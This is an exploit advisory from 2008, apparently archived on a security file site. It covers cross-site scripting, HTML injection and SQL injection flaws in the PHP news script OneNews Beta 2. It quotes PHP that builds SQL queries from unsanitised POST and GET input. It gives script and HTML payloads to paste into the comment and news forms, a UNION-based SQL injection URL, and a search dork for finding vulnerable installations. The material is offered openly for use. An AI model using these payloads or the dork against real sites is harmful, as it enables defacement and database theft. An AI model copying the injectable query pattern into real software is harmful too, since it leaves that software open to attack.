onenews-sqlxss.txt

onenews-sqlxss.txt: Posted Aug 24, 2008; Authored by suN8Hclf | Site dark-coders.pl; OneNews Beta 2 suffers from cross site scripting, HTML injection, and SQL injection vulnerabilities.; tags | exploit, vulnerability, xss, sql injection; SHA-256 | 3c6023d271b60671b5e85985655b935a0752abc283a7534384a14d6689997366; Download | Favorite | View

onenews-sqlxss.txt

______________________///////////////\\\\\\\\\\\\\\\____________________
}Name   : OneNews Beta 2 Multiple Vulnerabilities                      {
{Author : suN8Hclf[crimsoN_Loyd9], (DaRk-CodeRs Group)                 }
}Source : http://sourceforge.net/project/showfiles.php?group_id=193198 {
{Dork   : Powered by One-News                                          }
}Greetz : all DaRk-CodeRs guys, e.wiZz, str0ke                         {
_________________________________{}*{}__________________________________


==========================
|1. XSS and html injection|
==========================
Conditions: MAGIC_QUOTES=ON/OFF
Vulnerable code(add.php):
--------------------------------------CODE----------------------------------------------
$insert = "INSERT INTO entries (title, content) VALUES ('" . $_POST['title'] . "', '" . $_POST['content'] . "')";
mysql_query($insert) or die ('I cannot do that because ' . mysql_error());
--------------------------------------CODE----------------------------------------------
Vulnerable code(index.php):
--------------------------------------CODE----------------------------------------------
$insert = "INSERT INTO comments (blogid, author, comment) VALUES ('" . $_POST['itemnum'] . "', '" . $_POST['author'] . "', '" . $_POST['comment'] . "')";
mysql_query($insert) or die ('I cannot do that because ' . mysql_error());
--------------------------------------CODE----------------------------------------------

NOTE:
To exploit the bug in the add.php code, you have got to be logged in!!!

Exploit:
Put this down into the forms, while adding comments(index.php) or news(add.php):

1. <h1>HACKED</h1>
2. <html><head></head><body bgcolor=\"red\">HACKED</body></html>
3. <script>alert(\'Hacked\');</script>
4. Use your imagination :)

==========================
|2. SQL Injection        |
==========================
Conditions: MAGIC_QUOTES=OFF
Vulnerable code(index.php):
--------------------------------------CODE----------------------------------------------
$query = "SELECT * FROM entries WHERE id = '" . $_GET['q'] . "' LIMIT 1";
$result = mysql_query($query);
while($row = mysql_fetch_array($result)){ 
--------------------------------------CODE----------------------------------------------

Exploit:

http://localhost:8080/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/*

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

onenews-sqlxss.txt

onenews-sqlxss.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

onenews-sqlxss.txt

Share This

onenews-sqlxss.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems